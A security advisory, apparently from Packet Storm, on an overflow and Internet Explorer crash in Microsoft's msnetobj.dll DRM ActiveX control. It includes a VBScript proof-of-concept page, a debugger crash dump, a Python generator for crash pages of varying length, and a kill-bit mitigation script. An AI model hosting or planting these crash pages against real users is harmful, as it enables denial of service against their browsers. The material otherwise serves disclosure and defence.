Microsoft DRM Technology Active-X Overflow / Denial Of Service

Reported by Asheesh Kumar Mani Tripathi, 18 Sep 2010. Source: packetstorm (packetstormsecurity.com)

The Microsoft DRM technology ActiveX control (msnetobj.dll) suffers from multiple remote vulnerabilities (buffer overflow, integer overflow and denial of service through an Internet Explorer crash), triggered when the victim visits a malicious website that instantiates the control.

Code
============================================================================================  
  
Microsoft DRM technology (msnetobj.dll) ActiveX Multiple Remote Vulnerabilities  
===========================================================================================  
  
by  
  
Asheesh Kumar Mani Tripathi  
  
  
# Vulnerability Discovered By Asheesh kumar Mani Tripathi  
  
# email [email protected]  
  
# company www.aksitservices.co.in  
  
# Credit by Asheesh Anaconda   
  
# Date 18th Sep 2010  
  
# Description: The Microsoft DRM technology ActiveX control (msnetobj.dll) suffers from multiple remote  
vulnerabilities: buffer overflow, integer overflow and denial of service (Internet Explorer crash). The issue is  
triggered when an attacker convinces a victim user to visit a malicious website that instantiates the control.  
  
The "GetLicenseFromURLAsync" method of the RMGetLicense object does not handle an oversized second argument  
correctly; an 8212-character string in that argument is enough to crash the browser (see the proof of concept below).  
  
Remote attackers may exploit this issue to execute arbitrary machine code in the context of the affected  
application, facilitating the remote compromise of affected computers. Failed exploit attempts result in  
browser crashes. Note that the crash data below demonstrates the denial of service only: the faulting  
instruction is a dword string copy inside ntdll (MOVS at 77BEEA7F) with ESI pointing into the msnetobj image and  
EDI at a stack slot, no 0x41 ("A") bytes appear in the dumped registers or stack, and the call chain bottoms out in  
msvcrt/KERNEL32/ntdll thread-start frames rather than in the script engine, which is consistent with the fault  
occurring on a worker thread after the asynchronous call returns. Control of EIP or of the copied data is not  
shown, so the code-execution claim should be treated as unverified.  
  
=============================================Proof Of Concept=============================================  
  
  
  
<object classid='clsid:A9FC132B-096D-460B-B7D5-1DB0FAE0C062' id='RM'></object>  
<script language='vbscript'>  
  
' Metadata describing the target method; not used by the script itself.  
targetFile = "C:\Windows\System32\msnetobj.dll"  
prototype = "Sub GetLicenseFromURLAsync ( ByVal bstrXMLDoc As String , ByVal bstrURL As String )"  
memberName = "GetLicenseFromURLAsync"  
progid = "MSNETOBJLib.RMGetLicense"  
argCount = 2  
  
arg1="defaultV"  
arg2=String(8212, "A")   ' oversized second argument (bstrURL) that triggers the crash  
  
' Call is required: invoking a method with parenthesised multiple arguments as a bare  
' statement is a VBScript syntax error ("Cannot use parentheses when calling a Sub").  
Call RM.GetLicenseFromURLAsync(arg1, arg2)  
  
</script>  
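The following is an added example, not part of the original advisory or the author's code: a small Python generator that rebuilds the PoC page above with varying lengths of the second argument, so the smallest crashing length can be bracketed by opening the generated pages one at a time in an isolated Internet Explorer test VM. The CLSID, ProgID, method name and the 8212-character value come from the advisory; the sweep and bisection helpers and the output file naming are this example's own choices.

```python
"""PoC page generator for the msnetobj.dll RMGetLicense crash.

Added example, not part of the original advisory. It rebuilds the advisory's
PoC page (same CLSID, ProgID, method and argument layout) while varying the
length of the second argument, so the smallest crashing length can be
bracketed in an isolated Internet Explorer VM. File names and the
sweep/bisection helpers are this example's own choices.
"""
from pathlib import Path

CLSID = "A9FC132B-096D-460B-B7D5-1DB0FAE0C062"   # from the advisory
PROGID = "MSNETOBJLib.RMGetLicense"               # from the advisory
METHOD = "GetLicenseFromURLAsync"                 # from the advisory
ADVISORY_LENGTH = 8212                            # arg2 length used in the advisory

PAGE = """<html><body>
<!-- {progid}.{method}: arg1 = "{arg1}", arg2 = String({length}, "{fill}") -->
<object classid='clsid:{clsid}' id='RM'></object>
<script language='vbscript'>
arg1 = "{arg1}"
arg2 = String({length}, "{fill}")
' Call is required: a method invoked with parenthesised multiple
' arguments as a bare statement is a VBScript syntax error.
Call RM.{method}(arg1, arg2)
</script>
</body></html>
"""


def build_poc(length, arg1="defaultV", fill="A"):
    """Return the PoC page with the second argument set to String(length, fill)."""
    if length < 0:
        raise ValueError("length must be non-negative")
    if len(fill) != 1 or fill in '"\\':
        raise ValueError("fill must be a single character other than a quote or backslash")
    if '"' in arg1:
        raise ValueError("arg1 must not contain double quotes")
    return PAGE.format(progid=PROGID, method=METHOD, clsid=CLSID,
                       arg1=arg1, length=length, fill=fill)


def sweep_lengths(start=0, stop=ADVISORY_LENGTH, step=1024):
    """Coarse sweep of arg2 lengths, always ending on the advisory's value."""
    lengths = list(range(start, stop, step))
    if not lengths or lengths[-1] != stop:
        lengths.append(stop)
    return lengths


def next_length(longest_ok, shortest_crash):
    """Bisection step between a length that did not crash and one that did.

    Returns None once the two lengths are adjacent, i.e. shortest_crash is
    the smallest length observed to crash.
    """
    if shortest_crash - longest_ok <= 1:
        return None
    return (longest_ok + shortest_crash) // 2


def write_variants(directory, lengths, **kwargs):
    """Write one page per length into directory and return the created paths."""
    out = Path(directory)
    out.mkdir(parents=True, exist_ok=True)
    paths = []
    for n in lengths:
        p = out / f"poc_{PROGID}_{n}.html"
        p.write_text(build_poc(n, **kwargs), encoding="utf-8")
        paths.append(p)
    return paths


if __name__ == "__main__":
    # Usage: open the coarse sweep in the test VM, then bisect manually with
    # next_length() between the last non-crashing and first crashing length.
    for p in write_variants("poc_pages", sweep_lengths()):
        print(p)
```

Passing a different `arg1` (for example a long string with a short `arg2`) to `build_poc` checks whether the crash depends on the second argument only, as the advisory's PoC implies, or on either argument.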
=============================================Exception details=============================================  
Exception Code: ACCESS_VIOLATION  
Disasm: 77BEEA7F MOVS DWORD PTR ES:[EDI],DWORD PTR [ESI]  
  
Seh Chain:  
--------------------------------------------------  
1 76E7E47D msvcrt.dll  
2 77BB99FA ntdll.dll  
  
  
Called From Returns To   
--------------------------------------------------  
ntdll.77BEEA7F ntdll.77BEE9D9   
ntdll.77BEE9D9 KERNEL32.770E7F75   
KERNEL32.770E7F75 ole32.779EB3E1   
ole32.779EB3E1 ole32.779EB50A   
ole32.779EB50A ole32.779AF6F6   
ole32.779AF6F6 ole32.779AF794   
ole32.779AF794 msnetobj.6B823726   
msnetobj.6B823726 msnetobj.6B823814   
msnetobj.6B823814 msnetobj.6B823C40   
msnetobj.6B823C40 msnetobj.6B823FA7   
msnetobj.6B823FA7 msnetobj.6B824513   
msnetobj.6B824513 msnetobj.6B823A9D   
msnetobj.6B823A9D msvcrt.76E82599   
msvcrt.76E82599 msvcrt.76E826B3   
msvcrt.76E826B3 KERNEL32.770ED0E9   
KERNEL32.770ED0E9 ntdll.77BF19BB   
ntdll.77BF19BB ntdll.77BF198E   
  
  
Registers:  
--------------------------------------------------  
EIP 77BEEA7F  
EAX 00000054  
EBX 00032A78 -> Asc: GsHd(  
ECX 00000000  
EDX 00000004  
EDI 035CEE28 -> 7FFD8000  
ESI 6B821434  
EBP 035CEE48 -> 035CEE90  
ESP 035CEE0C -> 00032A78  
  
  
Block Disassembly:   
--------------------------------------------------  
77BEEA68 PUSH EDI  
77BEEA69 JNZ 77C25E3F  
77BEEA6F TEST BYTE PTR [EBX+10],1  
77BEEA73 JE 77C25E93  
77BEEA79 MOV EAX,[EBX+18]  
77BEEA7C LEA EDI,[EBP-20]  
77BEEA7F MOVS DWORD PTR ES:[EDI],DWORD PTR [ESI] <--- CRASH  
77BEEA80 PUSH 77BEEABD  
77BEEA85 MOVS DWORD PTR ES:[EDI],DWORD PTR [ESI]  
77BEEA86 PUSH 1C  
77BEEA88 ADD EAX,EBX  
77BEEA8A PUSH EDX  
77BEEA8B MOVS DWORD PTR ES:[EDI],DWORD PTR [ESI]  
77BEEA8C PUSH EAX  
77BEEA8D LEA EAX,[EBP-20]  
  
  
ArgDump:  
--------------------------------------------------  
EBP+8 00032A78 -> Asc: GsHd(  
EBP+12 6B821434  
EBP+16 035CEEB0 -> 00000040  
EBP+20 00000000  
EBP+24 77AC1424 -> 779EBEC8  
EBP+28 6B821434  
  
  
Stack Dump:  
--------------------------------------------------  
35CEE0C 78 2A 03 00 08 00 15 C0 00 00 00 00 B0 EE 5C 03 [..............\.]  
35CEE1C 04 00 00 00 34 14 82 6B 00 90 FD 7F 00 80 FD 7F [.......k........]  
35CEE2C 44 EE 5C 03 01 6C BF 77 68 EE 5C 03 84 EE 5C 03 [D.\..l.wh.\...\.]  
35CEE3C 88 EE 5C 03 80 EE 5C 03 92 59 7C 75 90 EE 5C 03 [..\...\..Y.u..\.]  
35CEE4C D9 E9 BE 77 78 2A 03 00 34 14 82 6B B0 EE 5C 03 [...w.......k..\.]  
  
  
  
ApiLog  
--------------------------------------------------  
  
***** Installing Hooks *****  
7735d5c0 RegCreateKeyExA (HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings,(null))  
Debug String Log  
--------------------------------------------------  
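Until a fixed msnetobj.dll is installed, the standard mitigation for a vulnerable ActiveX control is the kill bit: Internet Explorer will not instantiate a control whose CLSID has bit 0x400 set in the "Compatibility Flags" value under HKLM\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{CLSID} (Microsoft KB 240797; on 64-bit Windows the 32-bit browser reads the same value under the Wow6432Node path). The Python below is an added example, not part of the advisory: it writes a .reg file that sets the kill bit for the RMGetLicense CLSID quoted in the PoC and parses a registry export to confirm the bit is set. The sample export is constructed for the demonstration and does not come from a real system.

```python
r"""Kill-bit mitigation for the RMGetLicense ActiveX control.

Added example, not part of the advisory. Bit 0x400 of "Compatibility Flags"
under ...\Internet Explorer\ActiveX Compatibility\{CLSID} stops Internet
Explorer from instantiating the control (Microsoft KB 240797). The functions
below emit a .reg file that sets the bit for the advisory's CLSID (under both
the native and the Wow6432Node key) and read a .reg export back to check it.
"""
import re

KILL_BIT = 0x400
CLSID = "A9FC132B-096D-460B-B7D5-1DB0FAE0C062"   # RMGetLicense, from the advisory
KEYS = (
    r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility",
    r"HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility",
)

_KEY_RE = re.compile(r"^\[(.*)\\\{([0-9A-Fa-f-]{36})\}\]$")
_FLAGS_RE = re.compile(r'^"Compatibility Flags"=dword:([0-9A-Fa-f]{1,8})$')


def killbit_reg(clsid=CLSID, existing_flags=0):
    """Return .reg text that sets the kill bit, preserving any flags already present."""
    flags = existing_flags | KILL_BIT
    lines = ["Windows Registry Editor Version 5.00", ""]
    for key in KEYS:
        lines += [f"[{key}\\{{{clsid.upper()}}}]",
                  f'"Compatibility Flags"=dword:{flags:08x}', ""]
    return "\r\n".join(lines)


def parse_reg_export(text):
    """Map CLSID -> Compatibility Flags from a .reg export of the ActiveX Compatibility key."""
    flags = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        m = _KEY_RE.match(line)
        if m:
            # Only CLSID subkeys of the ActiveX Compatibility key carry the kill bit.
            current = m.group(2).upper() if "ActiveX Compatibility" in m.group(1) else None
            continue
        m = _FLAGS_RE.match(line)
        if m and current is not None:
            flags[current] = int(m.group(1), 16)
    return flags


def is_killed(export_text, clsid=CLSID):
    """True if the export shows the kill bit set for clsid."""
    return bool(parse_reg_export(export_text).get(clsid.upper(), 0) & KILL_BIT)


# Constructed sample export (not a real system's registry): the vulnerable
# control still runs, while an unrelated CLSID already carries the kill bit.
SAMPLE_EXPORT = """Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Internet Explorer\\ActiveX Compatibility\\{A9FC132B-096D-460B-B7D5-1DB0FAE0C062}]
"Compatibility Flags"=dword:00000000

[HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Internet Explorer\\ActiveX Compatibility\\{00000000-0000-0000-0000-000000000001}]
"Compatibility Flags"=dword:00000400
"""

if __name__ == "__main__":
    # Usage: check the current state from a "reg export" of the key, then
    # import the generated .reg file with regedit or "reg import".
    print("kill bit already set:", is_killed(SAMPLE_EXPORT))
    print(killbit_reg())
```

The kill bit only stops the control from loading in Internet Explorer and other hosts that honour the ActiveX Compatibility key; it does not remove msnetobj.dll or protect applications that load the library directly.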
